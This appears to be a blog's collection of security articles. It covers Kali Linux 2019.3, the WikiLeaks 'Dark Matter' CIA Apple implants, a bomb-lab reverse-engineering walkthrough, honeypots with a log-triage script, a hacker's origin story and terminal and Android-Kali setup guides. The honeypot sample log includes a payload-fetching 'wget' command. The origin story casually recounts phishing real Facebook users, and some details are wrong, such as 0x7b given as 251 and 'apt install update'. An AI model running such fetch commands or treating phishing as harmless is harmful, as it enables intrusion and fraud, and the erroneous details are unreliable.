Articles by "Ethical hacker"

When we talk about Kali Linux, we mean one of the most important and best-known ethical hacking suites worldwide. It offers users a wide range of possibilities, which is why so many people pay attention to what each new version brings. In this article we cover the news of Kali Linux 2019.3 and explain how to download this Linux distribution.

As often happens with each new update, whatever the type of program or system, they bring improvements. These improvements translate into new functions or tools that benefit users' day-to-day work. You also have to keep in mind that each new version corrects existing problems.

Kali Linux allows users to perform different ethical hacking tests. This release brings a series of new features that make the distribution even more attractive. It is the third release of 2019. We will comment on the most important changes.

What's new in Kali Linux 2019.3

One of the novelties of Kali Linux 2019.3 that we can mention is that they have started using the Cloudflare CDN to host the repository and distribute content to users. The aim is to improve the quality and speed of downloads.

There are also changes regarding metapackages. There is now an additional, unique image called kali-linux-large-2019.3-amd64.iso.

Kali Linux 2019.3 is not a major update that brings very significant changes; however, it has improved certain applications. For example, tools like Burp Suite, HostAPd-WPE, Hyperion, Kismet and Nmap have all been updated to a new version and include improvements.

One of the significant changes in relation to applications is that it now includes Amass. It is a tool that security professionals can use to map the network and discover possible external threats. This tool now ships as standard with Kali Linux.

Finally, it should also be mentioned that bug fixes and security fixes have been made. These corrections, in short, make this new version safer.

How to get Kali Linux 2019.3

It should be mentioned that users who already have this distribution installed and kept up to date will not have much to do. They simply have to run, as root on Kali, the command `apt update && apt -y full-upgrade` to make sure they have the most current version.
For those users who do not have it installed or want to obtain the ISO for some reason, it is best to go to the official website. There you just have to go to the download section and download the version you want (64-bit, 32-bit ...).

As we always say, it is important to download software from official and reliable sites. We must avoid doing it from third-party links when we don't really know who they belong to and what could be behind them.
In addition, keeping systems updated brings important benefits. On the one hand we will have the most up-to-date tools and thus gain improvements in performance. Security is also very important, however: security vulnerabilities are corrected with each new update, patching faults that could otherwise be exploited by cyber criminals.
The trail of documents leaked by WikiLeaks continues. After publishing almost 9,000 documents about "Vault 7", which contain information on spy tools used against smart TVs, smartphones, computers and even cars, WikiLeaks is back with details about how the Mac and iPhone have been spied on by the CIA for several years.

WikiLeaks leaked 12 new documents that provide a more in-depth look at the hacking techniques that the CIA allegedly used against Apple devices such as Macs and iPhones. This leak, which WikiLeaks identifies under the code name Dark Matter, is part of a series of dumps called Vault 7, which WikiLeaks claims are hacking tools obtained from the CIA.

The first leak, called Year Zero, came to light in early March and included wiki pages from the CIA intranet, with documentation for some of the CIA's cyber weapons.

This original leak included documents related to the CIA's supposed arsenal of OS X and iOS hacking tools. Today's Dark Matter dump provides 12 new documents that contain much more information about those tools.

WikiLeaks had promised that those 9,000 documents were just the beginning, and so it has proved. Today they are unveiling the "Dark Matter" project, which belongs to "Vault 7" and consists of espionage tools for Apple devices. These would be able to directly infect the computer's firmware, which means that not even reinstalling the operating system would remove the infection.

Dark Matter


For example, Sonic Screwdriver is a hacking tool that CIA operators can deploy from an Apple Thunderbolt-to-Ethernet adapter.

This hacking tool allows the operator to execute malicious code from a USB stick, CD, DVD or portable hard drive during the boot of a Mac, even if the Mac's firmware is password protected.

Another tool, called DarkSeaSkies, "is an implant that persists in the EFI firmware of an Apple MacBook Air computer, installs a Mac OSX 10.5 implant and executes a user space implant."

In addition, DarkSeaSkies includes smaller components. 

DarkSeaSkies consists of three different tools:

  1. DarkMatter: An EFI driver that persists in the firmware and installs the other two tools.
  2. SeaPea: A Mac OSX kernel-space implant that executes, and provides stealth and privilege to, the user-space implants.
  3. NightSkies: A Mac OSX user-space implant that beacons to a listening post and provides command and control.

The other two tools, Triton and DerStarke, are related. Triton is an automated implant for Mac OS X, while DerStarke is a diskless, EFI-persistent version of Triton.

As you can see, all the tools target the EFI / UEFI (Unified Extensible Firmware Interface) specification, the software component that initializes the hardware while the operating system starts, replacing the old BIOS.

Placing malicious code in EFI / UEFI guarantees an attacker that the code will execute on every boot, even if users reinstall their operating system.

"Sonic Screwdriver"

These new documents detail how the CIA has been infecting MacBook Air devices over the past few years using something they have dubbed "Sonic Screwdriver", yes, in honor of the famous Doctor Who weapon. This tool can be placed on all types of USB devices, peripheral cables and adapters, such as the Thunderbolt-to-Ethernet adapter widely used with this notebook, which install spyware when connected to the computer, regardless of whether it is protected by a password.

This malicious code is installed during the boot of the computer and is stored permanently in the kernel, so access credentials or other data are not needed, and it remains even if the entire device is formatted. The worrying thing is that the documents reveal that the CIA continued using this tool during 2016, and even updated it for new Mac computers, whether portable or desktop.

Within "Dark Matter" we also find other spy initiatives such as "NightSkies 1.2", which has been used since 2008 to infect new iPhones. It should be noted that this tool, which is a "beacon / loader / implant", has also been updated over time, but unlike the Mac tool it is designed to be installed on new devices. This means that the CIA has intercepted iPhone orders and directly attacked production lines to place this malware on the devices, something they have been doing at least since 2008.

WikiLeaks notes that the Mac tool is very specific to well-located targets, where they have placed modified cables and adapters with the idea of spying on certain groups in different parts of the world. The case of the iPhone is different, since here the entire production chain had to be attacked, which means that many iPhones have this malware installed without the user knowing.

The CIA targeted iPhones one year after their launch

Although it does not appear prominently in the description of the tool, the DarkSeaSkies NightSkies module also comes with support for iPhone devices.

A July 2008 document, one year after the launch of the iPhone, details how NightSkies could provide "upload, download and execution capability" on Apple iPhone 3G v2.1 devices.

The document says that CIA operators needed physical access to install the NightSkies implant, but once installed, NightSkies would only work when it detected user activity on the device, hiding its traffic among the user's actions. This gives a state-sponsored attacker such as the CIA the advantage that all APTs want most: stealth.

Although the leaked documents do not mention this detail, WikiLeaks states that NightSkies "is expressly designed to be physically installed on fresh factory iPhones," and that "the CIA has been infecting the iPhone supply chain of its targets since at least 2008."

At the time of writing the CIA has never officially recognized the authenticity of the leaked WikiLeaks documents. However, Motherboard pointed out yesterday that the Agency had asked a judge not to allow documents downloaded from WikiLeaks in a case, as they were "classified content", accidentally acknowledging their authenticity.

More information | Wikileaks

It is not clear whether the CIA can hack more modern products, whose security measures are much stricter than those of that time, although it is obvious that this is one of its goals.

It is also clear that Apple is not particularly happy with these revelations, judging from the statement issued by the Cupertino firm:

We have made a preliminary assessment of the WikiLeaks revelations this morning. Based on our initial analysis, the vulnerability only affected the iPhone 3G and was solved in 2009 when the iPhone 3GS was launched. Additionally, our preliminary assessment shows that the alleged vulnerabilities were resolved in all Macs launched after 2013.

We have not negotiated with WikiLeaks to obtain any information. We have provided them with instructions to deliver any information they desire under our normal process and our standard terms. At the moment we have not received any information from them that is not in the public domain. We constantly defend the security and privacy of our clients, but we do not condone theft, nor do we coordinate with those who threaten to harm our users.

The tone used by Apple is not the usual one. Partly because, although WikiLeaks has offered to collaborate with the companies affected by these tools to close their security holes, the organization has indicated that it will only do so if the affected firms accept a series of undisclosed conditions.
Hi fellas,
A few days ago, I decided to start my adventure in the reverse engineering domain. I was quickly overwhelmed by a bunch of information and opcodes that confused me a lot, even with solid knowledge of assembly and programming.
Reverse engineering can seem complex at first glance; however, with a good methodology and toolkit, everything becomes more meaningful.
This article aims to guide you, based on my own experiences, through your first steps in this strange and odd universe.


So, here we are: you downloaded your first binary and now … what to do? RE requires two types of analysis, static and dynamic. Static analysis will give you a better overview and understanding of what is going on within the binary, whereas dynamic analysis will allow you to follow, step by step, the changes that occur within each register, which system calls are used, etc.
The following methodology is pretty basic. We start with static analysis to spot odd pieces of code, which then have to be analysed in depth through dynamic analysis. Pretty simple, right? But which tools can you use?

Static analysis

I must admit that I didn't take the time to assess the different tools available on the internet. I instantly jumped on Binary Ninja due to its low cost ($99) compared to the functionality provided.
Binary Ninja is dedicated to static analysis, providing an awesome GUI, which is priceless when you have to deal with such an amount of information!

As you can see in the image above, Binary Ninja displays the entire call graph of your executable, making it easier to understand how the blocks interact. Moreover, you can easily switch views via the bottom-right select menu. Lastly, the left side lists every function, directly accessible with a simple mouse click.
In addition, this software allows you:
  • To place comments within the code
  • To patch the binary through assembly or C code
  • To access an API to develop your own plugins and accelerate the analysis process
  • To access a bunch of plugins available from their GitHub
  • Other functions that I haven't used yet ^^
Note: A demo version is available for free and should be enough for beginners.

Dynamic analysis

Dynamic analysis can be done through various tools, e.g. gdb, radare2, etc. From my personal experience, radare2 is far from being user-friendly. Indeed, without the stylesheet, I wasn't able to remember the shortcuts, which made me waste a lot of time! However, gdb seems to do the job, and pretty well… Moreover, the gdb user experience can be improved by using peda (Python Exploit Development Assistance for GDB), which enhances gdb's display by colourising and showing the disassembly, registers and memory information during debugging.
Here is the enhanced CLI:


To show you how to apply and use this methodology, I chose to show you how I successfully reversed the third phase of the bomb lab, developed by Carnegie Mellon University, which @_py makes available on his CTF platform skidophrenia.
Here is the phase 3 entry point:

Assumption: The solution seems to have 3 components, two integers and 1 character.
Let's break on the address 0x08048bbf to see the state of the registers.
Input tried: 1 2 3

Ok, well, it seems that the register EAX represents the number of arguments matched by sscanf, which confirms our previous assumption. Indeed, at least three values are necessary to pass to the next block.
Here are the next blocks:


  1. Check if the first integer is above 0x7. If yes, the bomb will explode (block not shown in the picture).
  2. We jump to the case corresponding to our first argument.
  3. Set the BL register to 0x6b and compare the third argument to 0x7b. If the values are equal, we jump to the next block; otherwise the bomb explodes.
  4. Check if the second argument is equal to BL, which was set previously. If not, the bomb explodes.
Consequently, we can assume that the password should be:
  • 3: representing the third case
  • k: corresponding to the ASCII value of 0x6b
  • 251: corresponding to the decimal value of 0x7b
Let's try it!

Challenge completed! As you can see, this challenge didn't need much dynamic analysis; however, this is quite rare. I chose this exercise to show you the importance of taking your time to perform static analysis, because it can easily represent 70% of the work. So, scrupulously analyse each piece of code to reach your goal!
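As an added example (not code from the post or from the bomb lab itself), here is the phase 3 logic recovered above rewritten as Python, with a small emulation of `sscanf("%d %c %d", ...)` so that the argument-count check seen in EAX is explicit. Only case 3 is in the CASES table because that is the only case the post describes; the third value is 251, the decimal input the post reports as passing, and the handling of unrecovered cases and negative first arguments is an assumption.

```python
"""Source-level reconstruction of bomb lab phase 3 as described in the post.

Added example: every switch case other than 3 is unknown here and is treated
as an explosion, which the real binary may not do.
"""
import re


class BombExploded(Exception):
    """Raised wherever the binary would jump to explode_bomb()."""


_INT = r"\s*([+-]?\d+)"   # %d: optional whitespace, then a signed integer
_CHR = r"\s*(\S)"         # " %c": the space in the format skips whitespace first


def sscanf_d_c_d(line):
    """Emulate sscanf(line, "%d %c %d", &a, &b, &c).

    Returns (count, a, b, c). Like sscanf, parsing stops at the first field
    that fails, and count is the number of fields matched so far; that count
    is the value the bomb tests in EAX after the call.
    """
    a = b = c = None
    m = re.match(_INT, line)
    if not m:
        return 0, a, b, c
    a = int(m.group(1))
    rest = line[m.end():]
    m = re.match(_CHR, rest)
    if not m:
        return 1, a, b, c
    b = m.group(1)
    rest = rest[m.end():]
    m = re.match(_INT, rest)
    if not m:
        return 2, a, b, c
    c = int(m.group(1))
    return 3, a, b, c


# switch case -> (expected second char loaded into BL, expected third integer)
# The post reads the compare constant as 0x7b but enters 251 and reports
# success, so 251 is used here (assumption: the decimal input is the right one).
CASES = {3: ("k", 251)}


def phase_3(line):
    """Return True if the input defuses the phase, else raise BombExploded."""
    n, a, b, c = sscanf_d_c_d(line)
    if n < 3:                       # block 1: fewer than three fields parsed
        raise BombExploded("sscanf matched fewer than three arguments")
    if not 0 <= a <= 7:             # block 2: jump-table bounds check
        # post: "above 0x7 explodes"; negatives assumed to fail the same check
        raise BombExploded("first argument outside the jump table")
    if a not in CASES:              # cases the post did not recover
        raise BombExploded("case not reconstructed")
    expected_bl, expected_c = CASES[a]
    if c != expected_c:             # block 3: third argument vs constant
        raise BombExploded("third argument mismatch")
    if b != expected_bl:            # block 4: second argument vs BL
        raise BombExploded("second argument mismatch")
    return True


def explodes(line):
    """Convenience wrapper: True if the input would blow the bomb."""
    try:
        phase_3(line)
    except BombExploded:
        return True
    return False


if __name__ == "__main__":
    print(sscanf_d_c_d("1 2 3"))    # the post's first try: three fields, EAX = 3
    print(phase_3("3 k 251"))       # the post's final answer
```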
Use Honeypots

Why Use Honeypots?

For an organization that has a reasonably complete security posture, including a mature threat intelligence capability, the implementation of a so-called "honeypot" should be considered. A honeypot is a kind of digital decoy set for potential attackers. It lures attackers in by mimicking the target they were searching for, sometimes with deliberately built-in vulnerabilities, apparently waiting to be exploited.
Once the attackers use the honeypot system, thinking they have reached the intended target, all actions are recorded and all modified and newly dropped files are captured. In this way, a great deal can be learned about potential adversaries, their Tactics, Techniques and Procedures (TTPs) and how they would circumvent the organization's actual production security controls. It allows for truly proactive security intelligence gathering, although there are some caveats.

The Issue With Honeypots

A honeypot can be a fine weapon in the arsenal of a defensive security team. Its use does, however, come with some challenges.
The obvious one is the risk that an attacker successfully exploits the honeypot and then manages to move laterally into the actual production network. It is vital to isolate a honeypot from every other network! This sounds like a straightforward task, but it only takes a single forgotten system or a single firewall rule change to create a very dangerous situation. Networks are inherently complex.
Another challenge is the amount of time, and with it the cost, that comes with managing a honeypot. The system needs to be configured and maintained, of course. But that's not all: the captured activity has to be used by the organization's security teams for it to be of any value. This takes a lot of time to structure and to fit into operational processes. The information needs to lead to actionable intelligence, such as blocking the adversary's infrastructure, creating Intrusion Prevention System rules, or creating or tuning malware signatures.
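The triage step just described, as an added example that is not part of the article: it reads a few constructed honeypot events in a generic JSON-lines schema (not the log format of any particular honeypot product), tallies activity per source address, collects the credentials and dropped-file indicators that feed signature tuning, and emits iptables block rules for sources that crossed a threshold. The event names, field names and IP addresses are all made up for the example.

```python
"""Turn honeypot event logs into actionable blocking intelligence.

Added example: the JSON-lines schema below is constructed for this page and
is not the output format of any real honeypot.
"""
import json
from collections import Counter, defaultdict

# Constructed sample events. Addresses come from the RFC 5737 documentation
# ranges; the hash value is a labelled placeholder, not a real file hash.
SAMPLE_LOG = """\
{"ts": "2019-09-05T10:00:01Z", "src_ip": "203.0.113.7", "event": "login_failed", "user": "root", "pass": "123456"}
{"ts": "2019-09-05T10:00:02Z", "src_ip": "203.0.113.7", "event": "login_failed", "user": "root", "pass": "admin"}
{"ts": "2019-09-05T10:00:03Z", "src_ip": "203.0.113.7", "event": "login_ok", "user": "root", "pass": "toor"}
{"ts": "2019-09-05T10:00:04Z", "src_ip": "203.0.113.7", "event": "command", "input": "wget http://198.51.100.9/x.sh"}
{"ts": "2019-09-05T10:00:05Z", "src_ip": "203.0.113.7", "event": "file_download", "url": "http://198.51.100.9/x.sh", "sha256": "constructed-hash-0001"}
{"ts": "2019-09-05T10:01:00Z", "src_ip": "198.51.100.22", "event": "login_failed", "user": "admin", "pass": "admin"}
{"ts": "2019-09-05T10:02:00Z", "src_ip": "192.0.2.50", "event": "login_failed", "user": "pi", "pass": "raspberry"}
this line is not json and must be skipped
"""


def parse_events(text):
    """Parse JSON-lines; skip blank or truncated lines instead of aborting."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # a sensor restart can leave a partial line behind
        if "src_ip" in ev and "event" in ev:
            events.append(ev)
    return events


def triage(events):
    """Aggregate per source address, per credential pair, and per dropped file."""
    per_ip = defaultdict(Counter)
    creds = Counter()
    downloads = {}  # sha256 -> set of (url, src_ip)
    for ev in events:
        per_ip[ev["src_ip"]][ev["event"]] += 1
        if ev["event"] in ("login_failed", "login_ok"):
            creds[(ev.get("user"), ev.get("pass"))] += 1
        if ev["event"] == "file_download":
            downloads.setdefault(ev["sha256"], set()).add((ev["url"], ev["src_ip"]))
    return {"per_ip": dict(per_ip), "creds": creds, "downloads": downloads}


def block_candidates(summary, min_failed=2):
    """Sources that got a shell, dropped a file, or hammered the sensor."""
    out = []
    for ip, counts in summary["per_ip"].items():
        if (counts.get("login_ok") or counts.get("file_download")
                or counts.get("login_failed", 0) >= min_failed):
            out.append(ip)
    return sorted(out)


def iptables_rules(ips):
    """One DROP rule per address, ready for the perimeter firewall."""
    return ["iptables -A INPUT -s %s -j DROP" % ip for ip in ips]


def download_iocs(summary):
    """Hash/URL pairs of dropped files, for AV signature and proxy blocklists."""
    rows = []
    for sha256, refs in summary["downloads"].items():
        for url, ip in sorted(refs):
            rows.append({"sha256": sha256, "url": url, "dropped_by": ip})
    return rows


if __name__ == "__main__":
    summary = triage(parse_events(SAMPLE_LOG))
    for rule in iptables_rules(block_candidates(summary)):
        print(rule)
    for row in download_iocs(summary):
        print(row)
```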

Using the Cloud

Some of the challenges mentioned can be overcome by using a public cloud system to host a honeypot.
The public cloud provides complete isolation from any production network. There is also no need for specific hardware or dedicated internet connections. Once a machine has been compromised and the data collected, a snapshot can be used to revert the system to the state captured before the attack took place.
Another nice advantage of using a public cloud infrastructure for a honeypot deployment is that it can be distributed anywhere in the world by choosing the desired geographical locations in the cloud system configuration. A sensor can be placed in East Asia one day and moved to Germany the next with just a couple of mouse clicks. Considering the fact that the attacks and attackers observed can differ a lot depending on the location of the exposed system, this is great for analysis and intelligence gathering purposes. A honeypot placed in Russia will see quite a different range of attacks and scanning activity compared to the same system in Brazil. A distributed honeypot network consisting of a manager and several sensors, such as the Modern Honey Network (MHN), benefits even more from this flexibility.
Some honeypot products are built around a private cloud instance as well, such as the Thinkst (Cloud) Canary. Canary honeypot devices are deployed at strategic locations inside the customer's network. These sensors all report back to a central, cloud-based system, allowing the customer to detect perimeter activity and lateral movement inside the production network when a real attacker unexpectedly interacts with one of these sensors. This system doesn't come cheap, but it still offers vital visibility once all other detections have failed to keep the attacker out. In this case, the cloud connectivity assists in the preservation of logs, improved customer accessibility and the very quick and easy deployment of what can be a complex honeypot infrastructure.


There is a direct correlation between placement and relevance when it comes to honeypots.

For a honeypot to produce the most relevant (and actionable) output, it must be somehow coupled to the organization a potential attacker is interested in. This could be via a fake company website or a registered domain name. Only then will the organization be able to observe attacks that are actually targeted, rather than simple scans from attackers looking for any low-hanging fruit. Of course, if possible, placing a honeypot inside the organization's existing cloud perimeter can also help in the identification of targeted attacks, but its isolation must be well designed.

There is also a legal and policy side to the use of honeypots. Some cloud providers don't particularly like the idea of directing hackers into their networks and collecting malware within their infrastructure. After all, once the host is compromised, there is a chance it is used to attack other targets on the internet. When this is the case, it may harm the reputation of the cloud provider (hosting the compromised system) and could even result in the blocking of that provider's IP ranges and domains, impacting its other paying customers.

When unsure, always check the acceptable use policies or contact the provider for permission before setting up a cloud-based honeypot system.

I don't want to make it any longer by adding some introductory part, so let's get straight to the point. Okay wait, I just want to tell you something: I am a noob. Let's go now!

Getting into infosec
So I am 19 years old at present and I was living a pretty boring life till the age of 15.

Then I got a computer, I “wasted” more than one year in playing games & social media which I kind of regret.

But one day, I decided to have some fun and I searched on google “How to hack facebook account” and I followed one of the results which was about Phishing.

I created a phishing page after struggling for an hour and posted it on facebook with the caption, “This app lets you see who views your profile secretly” and about 5 people fell into that trap.

“Damn! This shit is lit”, I said to myself. When you do something new and it goes well, you get excited about the possibilities and the same thing happened with me.

After this incident, I joined some facebook groups related to hacking but they were full of spam.

I was very eager to learn hacking so I created my own group named "Ultimate Hackers" which I know sounds really very cringy. I started inviting people to join it whom I thought had good knowledge.

One month passed and now I was aware of the very basic concepts like phishing, keylogging, RATs etc. I wanted to learn but I wasn't sure "what" to learn and then I saw two guys arguing about something on a thread. They were using terms that I had never heard so what I did was that I noted down all those terms in a notebook. I picked one of those terms and searched about it on google and started reading about it but then there were other terms that I didn't know.

An idea came into my mind, I wrote down those terms as well and picked one of them to read about it and again noted down things I didn’t understand. I was learning a lot of new stuff this way and this time it was happening really fast because of the recursive nature of this methodology.

At the end of the day, I used to post what I learnt in my facebook group in my own words which people liked very much and the group started to grow very fast.

Apart from my inner desire, now there were people who supported me and asked me to write on various topics. Everyone wants to get appreciated for what they do, it's basic human nature. Appreciation makes you work harder to satisfy expectations and the same thing happened with me.

I met some other genuine people and we became a team, “Team Ultimate” which I don’t think is a cringy name at all.

Anyways, everything was going extremely well, I started to explore web apps hacking but then something happened which changed my life, in a good way.

Well I was wandering around github and I found an XSS scanner written in python named XSSYA. I liked it, big ass banner & ability to retrieve PHPSESSID without even executing the payload. Yep, I know that's the most autistic thing ever but I didn't know much at that time so I thought it's cool and I downloaded it.

But when I ran it, it threw some errors and I fixed them without any programming knowledge, thanks to stackoverflow and common sense.

So it was working now and I thought it's open source and its license says anyone can modify and redistribute it so I changed the banner and the author name self-facepalm.

Somehow I managed to integrate it with another program named Damn Small XSS Scanner.

The final script was working fine and I was proud of this little achievement of mine so I created a github account and uploaded it.

I had no idea how but a website featured it and the original author of the tool found out that I am using his code. He opened an issue on github and told me that I am a fake guy and people saw that and some of them called me a script kiddie and a “copy-paster”.

You know that the smallest* unit of matter is an atom right? Take one electron out of it and split it into thousand parts and take one part of them and that’s the size of my ego and it got hurt :v

A new start
My condition was like an injured lion coughs maybe that's too much, a cheetah maybe? I just wanted to take that weight off my chest and there was just one way to do it, learning XSS and python.

How I learned Python?
The best way to learn a programming language is to code in it. No book, YouTube videos or $99 courses can teach you programming, just fucking start writing code. Of course you need resources to learn from so here's what I did to learn python:

  • "Learn Python The Hard Way" [Book] [Online interactive course]. It gave me a glimpse of real world programming problems.
  • By modifying open source programs (without putting them on github this time :p ). This part helped me the most, I learned a loooooot. I learned about different libraries and the way developers solved a particular problem and what not.
  • By writing my own tools from scratch
How I learned XSS?
  • Random Blogs (10%) (15%)
  • XSS Challenges (10%)
  • Looking at payloads & figuring out how they work (25%)
  • Learning HTML, Regex & JS + Experimenting (40%)
My ego was now somewhat satisfied but I didn't stop after it, I kept learning new attacks and techniques. I learned new programming languages. I also started to explore OSINT, GeoINT & SE.

I have done stuff. Yep, that’s my only achievement so far. No hall of fame from beg coughs under the breath: why do I say such controversial stuff so I was saying I don’t have any hall of fames from bug bounties, no certification etc.

Btw the stuff I have done includes around 30 programs I have contributed to the community. Thanks for loving them, you made me the #1 python Github developer in India and #78 worldwide.

6 of them have been featured in Black Arch & others have been featured in some respected blogs & websites like hakin9 magazine, shodan, penetester academy, kitploit and 69 others :grinning:

Tips & Resources
Here are some pro coughs noob tips from my side:

  • Note down & google unknown terms, recursively.
  • Read the same thing from 5 different articles. When you read a blog, you learn what the writer knows but reading the same thing from 5 different articles lets you see the topic in consideration from different sides.
  • When you are trying to learn a new programming language with the help of a video course or a book, you must write programs in it otherwise you won't grasp anything. Programming is about innovation and problem solving.
  • I have a request to all the beginners out there, please don't get into bug bounty. If you are doing hacking for t-shirts or money, you are doing it wrong. Okay, do whatever you want to but please don't call yourself a "security researcher". Okay, do whatever the fuck you want but please don't spam my facebook, linkedin and twitter with a….never mind, lets move on to the next one.
  • Learn Regular Expressions. It is an amazing skill to have and it will make you better at various unix operations, bypassing security filters and will help you solve a lot of programming problems.
  • Start a blog! Writing articles helps you question your knowledge. Some people will read it and will appreciate your work, it will make you feel better. Some will point out your mistakes or things you missed, it will make you better. So it's a win-win deal!
  • When you get trolled or humiliated for something, you always have two options. First one is to stay where you are and crush your self respect. The second one is to take it as a challenge, work hard and be better than the people who trolled you. I got trolled for Python and XSS right? Look at me now, I wrote XSStrike which is an XSS detection suite written in python. XSStrike is the best tool in its category. And it will stay at the top unless someone's ego gets hurt :wink:
  • Blogs, documentations, white papers, presentations and slides are better than any hacking courses or books.
  • Twitter is an awesome source for good reads and latest infosec related events. You can find some of the good people in my following list.
  • Instead of providing you a huge ass list of stuff I am leaving links which have huge ass lists of stuff :grinning:

That’s all for now. Keep making & breaking things!

Use the damn terminal

This guide was written for Debian and Ubuntu but should work with any Linux distribution and with OSX.
What we hackers need is a portable setup that is easy and fast to install and requires minimal configuration. It's also important for the setup to work on servers, should you need it there.
Here are some tips and advice to help you out.

Keyboard typing

To be honest, that part sucks. It's a hard skill to acquire but it's the most important one. If you can type fast, without looking at your keyboard and without typos, you'll be like those Hollywood hackers. No software can beat that.
Klavaro is your friend. Just "apt-get install klavaro" and there you go. Check this guide for more info.

Terminal emulator

Don't use the default terminal emulator. It sucks.
What we're going to use here is Terminator. It's not that great but it works everywhere. What we need it for is split windows. Download it. As you get accustomed to using the terminal you'll need to multitask.
Make sure you change the font to something that suits you. Smaller is better as it will allow you to cram more windows into your terminal.
At some point you'll probably want to customize your options. Check the Terminator config manual.

Term browsing

Yep… It's a thing. And it's very useful. W3M is your friend. "apt-get install w3m" and then "w3m".

Multiple sessions over multiple servers

Byobu is a neat piece of software that helps you manage multiple terminal sessions. It keeps them alive on your local and remote machines. Once installed, use the F1 key to configure it and access help, and use F2, F3 and F4 to create and move between windows.
Just type "apt-get install byobu". To enable it by default on remote servers use "byobu-enable".
My favorite trick is keyboard copy/paste. Press F7 and move around, then press the spacebar to select your text, and press Enter to return to normal mode. Paste with F12 and then CTRL plus ].

Bash the shell

Bash is great and all, but ZSH is greater.
The first thing you need to learn about is auto-complete. It's what happens when you start typing a command or a path and hit the TAB key. ZSH auto-complete is freaking awesome.
Then there's OhMyZSH. A one-command curl install and you'll have a complete setup, ready to roll. It's bliss. Be sure to check the included themes and plug-ins.

Vim (and not Emacs)

Vim is a great code editor but… vim.spf13 made it awesome. Perfect, even. Vim is hard to learn at first but it's on all systems. You'll be glad to know it when you start navigating those weird Russian servers ;)

Color schemes

At some point you'll want to choose and get used to a color scheme. It's really important when you spend hours in the terminal, so take your time to try some out.
Solarized is the most popular one. I don't like it but it's everywhere. You'll always be able to use it whatever app you're on.
If you need help choosing a color scheme check Vim Colors.

Powerline fonts

Some themes and software like Vim can take advantage of patched fonts and provide you with advanced feedback. Installing them is easy.
cd ~/Downloads ; git clone ; cd fonts ; ./ ; cd .. ; rm -fr fonts

With ZSH

To take advantage of powerline fonts with ZSH use the agnoster theme. You’ll need to edit your ~/.zshrc file.

With SPF13 VIM

You need to create ~/.vimrc.before.local and add the following line “let g:airline_powerline_fonts=1”.
Well, not everybody has access to a Kali Linux machine, but there are nearly two billion Android phones out there today. We'll show you how to turn any Android device into a Kali Linux machine. In this tutorial, "userland" refers to the space outside of an operating system's kernel, meaning anything that doesn't actually have root access.

We can use an app of the same name, UserLAnd, to install Kali Linux or any other supported operating system on any unrooted Android phone. While this is pretty incredible, there are a couple of limitations to it, but in general you are able to communicate with the instance of whatever Linux system you want via SSH or VNC. Depending on what you want to run, this is a pretty important decision, because VNC gives you a full graphical user interface, whereas SSH is simpler but limits you to the command line only. Today we're going to explore some command line tools, so

we'll be using SSH, but you can also check this out using VNC if you want to explore this with a GUI, maybe if you're a little bit more of a beginner and you want to be able to click around and have the general interface experience you would expect with Kali Linux. In order to follow along you will need any unrooted Android phone. In this example I'll be using a Samsung phone, but you can use pretty much anything because it doesn't need to be rooted in order to work. Once you have one, we can begin.

Install the ConnectBot App

Now, to get started with installing a Linux system on your Android device, you'll need to have a way of communicating with it. As I mentioned before, we're going to be using SSH to communicate with our instance of Kali Linux, so to do so we can go ahead and use the recommended app, which is ConnectBot. I've downloaded JuiceSSH to go with a previous version that used to work and I'm going to continue using it for this particular guide; they both work roughly the same, so you can use whichever one is your preference. In general I find that JuiceSSH works just fine for SSH-based connections, although ConnectBot may work a little bit better for VNC.

Install the UserLAnd App

Once you have this installed and we have a way to communicate, we need to download the UserLAnd app, so you'll need to look for this icon and then go ahead and press install. Once this download completes you'll be able to open it up, and basically what will happen is you'll get a list of available operating systems that you can run. These are very stripped-down versions, so they won't have some of the tools that you might normally recognize; even things like ifconfig or ipconfig will just not work. In order to get that working we'll need to install a couple of things, and even installing that won't work until we do an update, so we've got a list of things to do ahead of us and it's gonna be a little bit of work before we get there. But once we do, we'll be able to run some really interesting tools without needing to rely on rooting our device.

Create a New Filesystem

Now that this is installed, let's go ahead and open it for the first time. We'll see there should be a list of different operating systems, and while initially we needed to work with Ubuntu or Debian, we can now go ahead and download Kali directly, although as I mentioned before this is going to be a very stripped-down version of Kali Linux. It'll need the ability to access our storage, so we'll click OK, and this will allow us to actually download this and have a little drive on our system that's hosting this Linux system. Here we'll go ahead and type in our information, then a password, and then a VNC password. Once you're done with this, hit Done and then Continue. As you can see, the VNC password is very picky: it needs to be between six and eight characters. All right, there we go. I'm not gonna save this, and as soon as this is done we'll need to select the type of connection we want to use to connect with this device, so we'll go ahead and click SSH. We'll be able to create this Kali Linux instance and then communicate with it via SSH as soon as the download and unpacking of the Kali Linux files is complete. Now that it's settled on the app, you can see that it's copying it to local storage, and after it extracts everything this should be set up and ready for us to start working with.

Interact with the Filesystem


Now we'll need to select which type of connection we're going to use, and since previously we indicated SSH, we're going to be using the tool we downloaded in the first step, which is either going to be ConnectBot or JuiceSSH depending on which one you decided to go with. Once this process completes we should see something asking us which one we want to select. Here we go. Initially this will try to drop us into our default SSH program, so I'm gonna go ahead and type in the password I set, and then I should see that I am in Kali in UserLAnd. You can see I am now the username I set up at localhost, which means I have successfully loaded a Kali system on this Android device.

So let's try something really basic: ifconfig. It doesn't work, so you might know that pretty much nothing is gonna work on this very stripped-down version. The reason for that is that the installation process is already pretty long with how many files it needs to download and install, so trying to get everything all at once just isn't going to work. So instead we'll need to install it ourselves.

Update the OS

We'll need to try to install this, but unfortunately that won't work either. Let's take a look and see why. If I type apt install and then net-tools, you can see that... oops, I also need to be sudo. You can see here that it'll attempt to do so, and usually it'll run into some errors where it's not able to resolve something; in some cases it might be able to fetch it, but a lot of times it will not be able to. Now it looks like my example works, so if I type ifconfig it should succeed, but a lot of tools won't. So let's go ahead and run an update first to make sure that our system is prepared and ready to use on this Kali device. Let's go ahead and type apt install update. Our new Kali system will also need root constantly, because you have to remember that we are just a guest on the system; we're not actually root. Once this update finishes... let's see... there we go. Once this update process finishes we should have a fresh list of all the sources, meaning that anything that's been updated since this particular image was released will be able to be updated normally, and we'll have all the freshest data we need to keep these packages updated. This is also a good step to run before doing an apt upgrade, because sometimes some packages in the upgrade will fail if they can't be resolved, so once we have all the information we need to run the upgrade, this would be a good time to go ahead and run that upgrade. So now we have a list of all the sources in Kali available at our fingertips. What is one of the most interesting things we can do?

Install Software

